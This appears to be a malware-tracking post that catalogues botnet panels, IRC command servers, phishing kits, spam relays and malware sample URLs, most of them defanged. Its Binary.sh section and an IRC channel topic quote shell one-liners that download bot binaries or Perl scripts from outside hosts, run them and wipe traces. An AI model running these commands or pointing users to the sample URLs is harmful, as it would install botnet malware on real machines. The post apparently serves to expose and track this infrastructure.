Resolved : [ poweroftech.com ] To [ 193.0.200.89 ]
Panel here : hxxp://poweroftech.com/poweroftech.com/soul/
Sample here : hxxp://www.gramer.pro/get/run.exe
Other samples : hxxp://www.gramer.pro/get/
Different folders : hxxp://poweroftech.com/
Loader.bat : hxxp://poweroftech.com/sin/ or direct link : hxxp://poweroftech.com/sin/loader.bat
Hosting Infos : http://whois.domaintools.com/193.0.200.89
Hydra Botnet (Hosted In France Paris Hexatom)
Around 100 Hydra bots inside.
Server : 149.91.89.253:6667
Channel : #perls
URLs : hxxp://208.67.1.142/ddos.pl hxxp://208.67.1.142/hack/ (you can get the rest of the files here)
Binary.sh :
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&
Trojan.GenericKD.3018192 (Hosted In Germany Falkenstein Hetzner Online Gmbh)
Email spam via these SMTP servers : "cdptpa-pub-iedge-vip.email.rr.com" "smtp.orange.fr" "smtp.sina.com" "smtp.googlemail.com" "smtp.tiscali.co.uk" "out.alice.it"
Servers used to spam : "173.194.195.16:25" "78.47.198.134:80" "62.24.139.11:25" "107.14.166.70:25" "193.252.22.86:25" "82.57.200.132:25" "202.108.6.242:25"
Downloaded files :
"GET /libeay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Mozilla/4.0 (compatible; Synapse)"
"GET /ssleay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent:
Worm Porphiex
Domains used by the worm :
Servers used by the worm :
Downloaded files :
62.76.191.108 (Dridex Downloader Hosted In Russian Federation Saint Petersburg It House Ltd)
URLs : hxxp://www.mraguas.com/43543r34r/843tf.exe hxxp://clothesmaxusa.com/43543r34r/843tf.exe hxxp://69.61.48.46/43543r34r/843tf.exe
Contact Server : 62.76.191.108:1743
Hosting Infos : http://whois.domaintools.com/62.76.191.108
comment.dyn.mk (Linux IRC Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)
Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] (possibly a hacked machine)
$server = 'comment.dyn.mk' unless $server;
my $port = '6667';
[11:00] * Now talking in #kill (around 100 bots inside)
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34 U
munachim.linkpc.net (Trojan-Spy.Win32.Recam.yyy Hosted In Canada Vankleek Hill Maxx Ltd.)
Resolved : [ munachim.linkpc.net ] To [ 67.215.4.74 ]
Contacted Hosts : hxxp://workshopnw.ddns.net hxxp://67.215.4.74 hxxp://serialcheck55.serveblog.net hxxp://gbuzue.ddns.net:288 hxxp://sedon1.ddns.net
Sample here : hxxp://clintonllc.com/swift.scr
Hosting Infos : http://whois.domaintools.com/67.215.4.74
DHL Phishing Script (Hosted In United States Provo Websitewelcome.com)
Resolved : [ rentmyryde.com ] To [ 192.232.247.118 ]
Main page : hxxp://rentmyryde.com/css/DHL/DHL/tracking.php
DHL.zip here : hxxp://rentmyryde.com/css/
Lamers behind the script : Created BY Mr-Anobs/Modified By Realone
Hosting Infos : http://whois.domaintools.com/192.232.247.118
inmrvogurin.ru (Pony Hosted In Macao Macau Alan Hqservers Web Studio)
This guy keeps changing domain names but he uses the same shit.
Resolved : [ inmrvogurin.ru ] To [ 163.53.247.144 ]
URLs : hxxp://inmrvogurin.ru/SY/test/gate.php hxxp://inmrvogurin.ru/SY/test/admin.php
TF letters in red, maybe a tribute to trojanforge.
Sample here : hxxp://inmrvogurin.ru/SY/test/micro.exe
Hosting Infos : http://whois.domaintools.com/163.53.247.144
proexti.ufam.edu.br (Trojan.Win32.Generic Hosted In Brazil Manaus Associacao Rede Nacional De Ensino E Pesquisa)
This is the downloader : hxxp://www.xup.in/dl,79161341/010-RELATORIOFINAL_2601.doc.exe.7z/
Domain used to download the trojan : hellolink.biz 110.4.45.31
URL : hxxp://hellolink.biz/pinjam.my/counter/WinProc.zip (unzip the file; the trojan exe is inside)
The trojan is packed with Themida and gets a file from here : proexti.ufam.edu.br/xmlrpc/content/count/B/fix.php
Hosting Infos : http://whois.domaintools.com/200.129.163.16